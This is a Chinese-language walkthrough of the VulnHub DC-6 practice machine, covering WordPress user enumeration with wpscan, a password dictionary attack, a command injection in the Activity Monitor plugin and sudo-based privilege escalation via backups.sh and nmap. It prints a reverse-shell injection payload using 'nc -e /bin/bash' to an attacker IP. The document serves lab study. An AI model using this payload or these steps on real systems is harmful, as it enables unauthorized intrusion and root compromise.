扫描开启的服务:开启了22、80端口
vulnhub - DC 6

目录遍历

vulnhub - DC 6

查看80端口,发现是一个WordPress客框架

使用wpscan进行用户枚举

wpscan --url http://wordy --enumerate u 发现有五个用户

vulnhub - DC 6

没有思路,在dc-6下载的官网有提示

vulnhub - DC 6

根据提示生成密码字典

vulnhub - DC 6

把五个用户写在一个文本,使用密码字典依次**

有一个mark用户 helpdesk01

vulnhub - DC 6
在后台进行登录
vulnhub - DC 6

这里有一个插件activity monitor;他有一个远程命令执行漏洞

vulnhub - DC 6

Tools 这里有一个提交Lookup

vulnhub - DC 6

抓包验证

vulnhub - DC 6

命令输入执行nc监听

127.0.0.9 | nc -e /bin/bash 192.168.56.133 4444
vulnhub - DC 6

查看home目录

Mark/stuff目录下面有一个文件

vulnhub - DC 6

Graham是前面爆出来的用户;

22端口是开启的,可以尝试ssh连接
vulnhub - DC 6

进行尝试提权

sudo -l 查看当前用户的执行权限

vulnhub - DC 6

jens/下面的backups.sh是一个可执行shell文件

在里面写上一个/bin/bash并执行,实行水平越权;可以拿到一个shell

Sudo -u jens ./backups.sh

vulnhub - DC 6

sudo -l 查看当前用户的执行权限

有一个nmap执行文件,是以root权限执行的

写一个nmap脚本,在执行脚本文件的时候,实现水平越权
vulnhub - DC 6

成功
vulnhub - DC 6

相关文章:

  • 2021-08-25
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-11-13
  • 2021-04-14
  • 2022-02-03
  • 2021-08-29
猜你喜欢
  • 2021-07-03
  • 2021-09-25
  • 2021-07-04
  • 2021-09-30
  • 2021-05-12
  • 2021-11-12
  • 2021-12-16
相关资源
相似解决方案